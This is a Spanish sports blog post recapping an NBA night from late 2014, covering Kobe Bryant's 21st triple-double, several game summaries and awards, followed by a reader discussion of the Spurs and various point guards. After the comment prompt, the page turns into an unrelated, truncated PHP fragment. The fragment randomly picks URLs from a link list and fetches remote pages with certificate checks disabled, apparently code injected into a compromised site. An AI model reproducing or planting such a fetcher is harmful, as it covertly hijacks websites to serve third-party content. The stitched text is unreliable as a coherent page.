La crónica: Kobe cumple 21…

31 de December de 2014 por TheDeerHunter

…21 triples dobles a la edad de 36 años, para convertirse en el 3er jugador que logra múltiples triples dobles en una campaña más allá de esa edad (Wilt Chamberlain y Jason Kidd) y el cuarto que lo logra ésta. En frente, los siempre complacientes Denver Nuggets, que permiten a los amarillos alcanzar los dobles dígitos en victorias, pero no le quitan un ápice de mérito a la hazaña del #24.

Jornada en la que los Hawks alcanzan la cabeza de su conferencia a costa de unos Cavs sin LeBron; Brook Lopez rompió la buena racha de los Bulls y los Grizzlies volvieron a dar matarile a los campeones.

Al grano…

kobtrip

Cavs 101 – Hawks 109

El peor momento del mundo para una lesión de LeBron. El peor para volver a enfrentarse a unos Hawks en forma a pesar de tampoco contar con Horford por unos súbitos problemas estomacales. Por si faltaba algo Love también sufrió problemas físicos y a Blatt le crecerán los enanos si pone un circo. Concierto de Irving contra el mundo que no es suficiente para doblegar a un señor equipo hoy por hoy. Derrota cantada y aún con suerte porque no hubo sangre.

Nets 96 – Bulls 82

Parón en seco de la progresión de los toros en un partido con olor a deméritos. Los Nets no parecen nada del otro jueves a pesar de que ahora parecen carburar mínimamente. Coincidió el mejor partido del curso de Brook Lopez (29 puntos, pero con sus típicos 5 rebotes) con una empanada general de las bazas ofensivas de los de Thibodeau (Butler 8, Rose 4, Mirotic 2…)

Spurs 87 – Grizzlies 95

Se complica por momentos un hipotético repeat. Conley brilló para anotar un 3-7 en los últimos 10 de San Antonio. Mientras los Pelicans aprietan ganando a los Suns, sus otros rivales directos… y los Thunder al acecho. Problemas defensivos en el equipo de Popovich y para colmo falta acierto exterior. La excelencia en buscar el tiro abierto no sirve de mucho si no se enchufan.

Resto de jornada

Ya hemos mencionado la victoria de Lakers en Denver y la de Pelicans ante Suns. Los Pistons ganaron en Orlando con Meeks tocando la guitarra. Los Mavs le dieron la tunda de la noche a un señor equipo como Wizards. Los Blazers lograron doblegar a Toronto en la prórroga y en los últimos partidos con equipos de zona baja implicados los Warriors ni sudaron ante Sixers y Utah ganó a Minnesota.

PREMIOS

MVP: El traje a medida que Mike Conley hizo anoche a los Spurs (10/13 TC, 30 puntos, 7 rebotes, 6 asistencias) sirve al base de los Grizzlies para compartir honores con Paul Millsap y sus 26 puntos, 9 rebotes, 3 asistencias, 3 tapones y 2 robos contra los Cavs. Hay que mencionar sin falta el triple doble de Kobe y otra exhibición de Drummond con 17-22-2-2-3.

Rookie: Cumplieron por Orlando Elfrid Payton (8 ptos 6 asis) y Dewayne Dedmon (8 ptos 10 rebs), y Wiggins se fue hasta los 21 puntos, pero nos quedamos con los 16 puntos, 8 rebotes, 2 asistencias, 2 robos y 2 tapones que firmó Jusuf Nurkic frente a los Lakers. El novato de los Nuggets fue el mejor de su equipo y el planeta NBA es un clamor: Free Nurkic!

La sorpresa: En un equipo donde juegan peloteros como Curry, Klay Thompson, Lee… siempre es una sorpresa que el máximo anotador sea Marreese Speights. Es un detalle que dice mucho del espíritu colectivo por muy buena campaña que esté realizando éste.

La decepción: Noche negra en general de la línea ofensiva de los Bulls.

El mayor esfuerzo en vano: Kyrie Irving en su salsa…35 puntos, 9 asistencias, 6 rebotes, 2 robos, pero con un reverso tenebroso de lanzarse hasta las zapatillas y perder un capazo de balones.

Top 10

Imágenes | AP Photos / Getty Images

Comenta

17 comentarios a esta entrada

  1. Hynreck dice:
    #1

    Cuando suleten a Nurkic sí que se hará de noche en el oeste…#freeNurkic

      Citar

  2. Denise dice:
    #2

    Dewayne Dedmon no es rookie. Ya jugó con Orlando el último tramo de la temporada, creo recordar que venía procedente de los 76ers.

      Citar

  3. Denise dice:
    #3

    Denise:
    el último tramo de la temporada,

    de la temporada pasada, quería decir…

      Citar

  4. Azabel dice:
    #4

    dos equipos bastante complicados

    Primero los cavs que siguen perdiendo juegos y salvo que despegen muuuuuucho, les va a costar colarse entre los 4 primeros del este y sin localia en todos los PO de conferencia, un equipo que parece tan endeble, no apostaria a que lleguen muy lejos

    Por otro lado, al fin le llego la hora Pop, “el rey de las rotaciones”, el irreverente, el distinto, bueno ahorita estan Septimos y a solo un par de juegos de los pelicans, no estan dando ningun fruto las rotaciones, cuando no juegan los titulares pìerden y cuando estos vuelven se les nota faltos de ritmo y para colmo los estan azotando las lesiones, se le habra acabado la magia a Pop?

      Citar

  5. Denise dice:
    #5

    Azabel:

    Por otro lado, al fin le llego la horaPop, “el rey de las rotaciones”, el irreverente, el distinto, bueno ahorita estan Septimos y a solo un par de juegos de los pelicans, no estan dando ningun fruto las rotaciones, cuando no juegan los titulares pìerden y cuando estos vuelven se les nota faltos de ritmo y para colmo los estan azotando las lesiones, se le habra acabado la magia a Pop?

    Yo voy a ser osado, y pienso que los Spurs no tienen ya nada que hacer ni que ofrecer en PO. El núcleo duro Parker-Duncan-Ginobili está agotado, el sorprendente MVP de las finales Leonard no está pudiendo rendir a tope por problemas físicos, y ni Belinelli ni Splitter consiguen dar un salto hacia adelante y dejar de ser jugadores de rol para convertirse en protagonistas. Y como revulsivos, Diaw, Mills y Joseph me parecen demasiada poca cosa como para revitalizar la segunda unidad teniendo en cuenta el nivelazo que hay este año en el Oeste.

    Creo que Buford debería dar un golpe de timón al equipo y hacer algunos traspasos. Ni el Big 3 por tema sentimental ni Leonard van a estar en el mercado, por lo que se me antojaría necesario traspasar a ese hombrecillo llamado Splitter que alguna vez fue bueno en Europa junto con Danny Green que acaba contrato, y traerme un bicharraco bueno que intimide en la pintura y desahogue a Duncan en defensa (Pekovic, Hibbert, Kanter, Sanders??)

    El que me gusta bastante es Kyle Anderson, ese chaval creo que va a hacer carrera en la NBA pese a haber caido tan abajo del Draft. En un par de años, debería ser pieza fundamental en los Spurs post-Duncan.

      Citar

  6. Nacho dice:
    #6

    Tema Spurs:
    Yo no soy pesimista con los chicos de Pop. Cierto que no andan finos, pero creo que es el año que más minutos se han perdido los jugadores importantes, y eso unido a la subida de calidad en el Oeste, depara los datos de ahora. Parker apenas ha estado, Leonard lo mismo, Splitter acaba de llegar, Belineli tampoco ha podido coger ritmo (ayer parece que sí), sin embargo no noto caída (por la edad) en el rendimiento de los abuelos Tim y Manu. Para mí siguen siendo los grandes favoritos a finales en el Oeste.
    A pesar de todo, tiene ese cuajo de equipo grande que pocos tienen en la liga. Eso que sale en PO que los verdes llamaron corazón de campeón.
    Y es que ese cuajo es difícil de mostrar. Por lo que he visto hasta ahora, tanto GSW como Blazzers, los líderes del Oeste, adolecen de ello. A mi juicio están mostrando su mejor cara desde ya, y no los veo con esa vuelta de tuerca necesaria para plantarse en las finales, me sorprendería mucho ver a alguno de ellos en la lucha por la final de la NBA.
    Por otro lado, Clippers y Rockets, siguen siendo incógnitas. Los angelinos dependen demasiado de CP, y las eliminatorias (y más con el nivel que habrá desde el primer partido) son demasiado largas. Solo Doc y un supermotivado Blake los llevarían lejos. Más plantilla hay en Houston, pero mucho menos entrenador. Lo de Brewer funciona desde ya, lo de Smith es una incógnita, de DH no creo que se esperase mucho más de tener a un muy buen jugador, pero si soñaban tener a un pivot dominante, creo que habrán despertado. Harden está superlativo, pero afinará así toda la temporada?
    Con lo que mis favoritos para lograr las dos plazas de la final son OKC, SA, Grizlies y Mav’s. Que llegue a PO en el Oeste otro que no sea cualquiera de estos ocho sería la gran sorpresa.
    Para los Thunder, juega en contra que van desde ya superexigidos, llegarán a postemporada, pero ¿en qué condiciones? Muchos partidos a ganar fuera de casa. Aún así son capaces de ello, y pueden revertir esa situación de estrés con la frescura que llegue Durant a las eliminatorias. Mi ‘odiado’ Westbrook seguirá callándome la boca, ¿hasta el final?
    Los chicos de Marc (y no olvidemos a Conley, del que soy superfan) tienen ese aire de los primeros Spurs, chutes de competición que Allen reparte por donde va. Si aguantan sanos, para mí, el candidato número uno a esa lucha por jugarse la gloria.
    Me molaban de inicio estos Mav’s. aún no los he visto con Rondo, pero imaginando el buen camino de esta unión, no les puedo augurar nada más que cosas buenas. El paso atrás dado por Dirk, en plan ahorro combustible, es manejado con soltura por el equipo. El alemán sabe que está a tiro la oportunidad de luchar por otro anillo, y eso da más garantías que una buena dosis de juventud. Y por si fuera poco, esa dosis, la tiene. Cuidado, que éste sí es un equipo de eliminatorias. Si los del Álamo fallaran, Dallas sería mi otra opción.

      Citar

  7. Azabel dice:
    #7

    es cierto sobre la competitividad del oeste, y tambien es mas cierto el corazon de campeon de los Spurs a la hora de la verdad, nadie apostaria en contra de ellos, pero este año digo, no ha dado fruto el tema rotaciones y descanso,
    cada vez que pop hace este el equipo pierde y hasta feo, y cuando vuelven no los veo del todo engranados y todavia bhuscandose, vale que falta y mucho parker, pero solo decia que Popovich esta tensado demasiado la cuerda con esto de las rotaciones y hasta les puede costar una de las primeras cuatro plazas de PO

    si fuera tyan sencillo variar y dar descanso a los jugadores e igual ganar lo harian todos, solo digo que se le esta terminando la soga y ahora basta de descansos y a ganar que tienen 9 juegos perdidos mas que los Warriors

      Citar

  8. Nacho dice:
    #8

    Ya Esteban, si en eso podemos estar de acuerdo, y lo importante que va a ser estar entre los cuatro primeros, porque con la ventaja de campo es más fácil pasar la primera ronda sin partidos de más. Pero está jodido de narices. Creo que solo un final de temporada largo como el del año pasado de los Blazers haría que éstos no estuvieran entre los cuatro primeros, a los Warriors los doy por descontado allí, y casi los Osos también, con lo cual nos dejaría una lucha por la cuarta plaza de la leche, en la que, a día de hoy, Houston y Dallas son los favoritos. Pero este año me da que va a haber juego táctico por posiciones. No creo que OKC ni Spurs lleguen a tener ventaja de campo, pero igual si tienen opciones de colocarse en posición de jugársela en primera ronda con GSW y Portland, que para mí son los menos fiables.

      Citar

  9. Nacho dice:
    #9

    Algo similar veo en el Este, pero con muchos menos equipos implicados. Falta saber si Hawks y Raptors tiene ese plus para PO (obvio que primera ronda, salvo los Cav’s, es fácil, si llegan los dos en ventaja de campo)
    Y así, con la gran incógnita, que tras un tercio de temporada ni han desvelado ni parece que lo vayan a hacer, de los Cavaliers, veo por encima de todos, para llegar a la final de conferencia a Bulls y Wizards (lo que puede dar, no ya por juego sino por espíritu, Pierce a este equipo es grande) y supongo que si siguen renqueando en Cleveland, su final de temporada será luchar por el primer puesto y mirar de reojo el no cruzarse antes de tiempo.

      Citar

  10. Nacho dice:
    #10

    Viendo un rato el Pacers-Miami antes de la ínclita cena.
    Dos cositas que veo:
    Los de Indiana van a crecer con George Hill, y creo que deberían llegar a postemporada.
    Alguien decía días atrás que Colison era el peor base titular de la NBA, supongo que sería porque no se sabe en Miami que es eso de base titular, porque ni Cole ni Chalmers dan la talla.
    Y por hacer patria de Azabel, cómo me mola Scola. De los mejores internos suplentes de la liga. Un tío que va a dar siempre. Que tiene asumido su rol, y que no creo que ponga problemas a nadie. Cuánto crecerían muchos equipos con él en el roster.

      Citar

  11. Jose Luis dice:
    #11

    Yo fui el de collison xddddd

    Quizá como base es mejor Collison, pero como jugador es mejor Chalmers creo. Más tirador que distribuidor, eso sí.

      Citar

  12. Futurman dice:
    #12

    Para mi son jugadores que pueden complementar a un escolta o salir desde el banquillo, como titulares importantes no llegan. Collison tiene poca lectura de juego y es irregular, Chalmers defiende y hace su trabajo, pero debe tener poco balón.
    Cole es igual que Chalmers, por eso el día que un está inspirado; le coge minutos al otro.

    Pasa lo mismo con Beverly de los Rockets, por ejemplo; y luego de los equipos de tanking, Lakers, Utah y Celtics también creo que tienen bases malísimos.

      Citar

  13. Triceratops dice:
    #13

    Buenas, Feliz año, soy el antiguo Denise, año nuevo nick nuevo y de paso cambio el nick que me acompañaba desde hace 7 años durante mi época adolescente-juvenil.

    Hablais de peor base titular de la liga, yo creo que ese “honor” tiene claro dueño, le corresponde a Jose Manuel Calderón. Su temporada está siendo malísima por sensaciones para un tipo que es el 4º mejor pagado de la plantilla y y 3º lider del equipo (ya que Bargnani esta lesionado), Sus números dan pena, 9 miseros puntos y 4 asistencias en 31 minutos de juego con un pobre 41% por no hablar de su inexistente defensa. Para defenderle, no me vale el argumento de que los Knicks son muy malos bla bla, porque al reves, eso juega en su contra, en este vertedero llamado Knicks, él debería destacar ya que siempre es más facil hacerlo en un mal equipo que en uno bueno, y ni aún con la de minutos basura que juega (porque los Knicks van perdiendo de 30) es capaz de al menos, maquillar sus números.
    En fin, que aproveche lo que resta de Navidad para vender jamones, porque en baloncesto no tiene mucho más que ofrecer.

    Sobre Collison, creo que lo infravalorais, me parece un jugón extraordinario, igual no es el base titular ideal para un claro candidato al anillo, pero el tio es un buen anotador y un buen revulsivo de encuentros debido a su electricidad.

    Respecto a Chalmers, creo que es un correcto jugador, no gran cosa, pero mejor que el Calderón actual de sobras. Me parece un correcto defensor, es capaz de anotar tiros abiertos desde el triple y nunca lo he visto haciendo filigranas ni tonterías. Y de vez en cuando, se saca unos partidazos de la manga.

    @Futurman: Discrepo absolutamente sobre que el base de Utah (Trey Burke) es malisimo. Le penaliza la altura, pero el tio es un gran anotador y asiste más que correctamente. Y sobre Marcus Smart (Celtics) dale un poco de margen que es un rookie.

      Citar

  14. Nacho dice:
    #14

    Denise, si vamos números, Chalmers mete dos puntos más por partido con peores porcentajes. Pero la cuestión para mí no es esa. NY es una banda que poco tiene que hacer este año, pero Miami, teóricamente (porque últimamente les he visto cosas raras, parece Jeckyll y Hyde) es equipo PO. Y lo debería ser con la gorra. Y tiene un equipo apañado, y muy interesante. Pero adolece de un base de calidad mínima (y creo que Calde daría la talla aquí), y es una de las zonas por las que hacen aguas. Se hablaba del rookie, pero no lo he visto y no se por qué no juega. Ayer Cole y él perdieron balones a cascoporro en el primer tiempo (que es lo que vi, no sé cómo terminaron). y con decisiones estúpidas en ataque, ambos.
    Y lo de que de ve en cuando le sale un partidazo no me vale, porque eso le puede pasar a 150 tíos de esta liga.

      Citar

  15. Futurman dice:
    #15

    Calderon sale de lesión y por eso le salvo xD Burke es un tipo “mediocre” dará para titular aceptable o gran suplente. Alomejor me como mis palabras en unos años, pero ni olerá All Star. De todos modos, yo hablaba de bases actualmente. Por eso incluyo a Boston, Smart está verdísimo y es titular, no le juzgo como rookie, si no como titular en el equipo.

      Citar

  16. Sancho88 dice:
    #16

    Darren Collison mejora como base a Isaiah Thomas. No estoy de acuerdo en que no tiene lectura de juego. Vale que no es el típico director, pero es muy rápido tomando decisiones correctas, sabe leer los partidos realmente cuando la pelota quema más. No se arruga y no toma las responsabilidades por su propio ego sino por el bien del equipo. Está consiguiendo que los Kings parezcan un equipo y no una banda de patio de colegio

      Citar

  17. Futurman dice:
    #17

    Isaiah es, como máximo un 6º hombre. Jugador que desatasca el partido y que da puntos a la segunda unidad. No puede defender a nadie por su tamaño. Collison es peor anotador puro y mejor en lo demás. Es una opinión, claro, pero Collison para mi no debería ser titular en un equipo contender, a no ser que sea con un Lebron o similar al lado, a lo George Hill; base por posición pero no por el tiempo con el balón.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>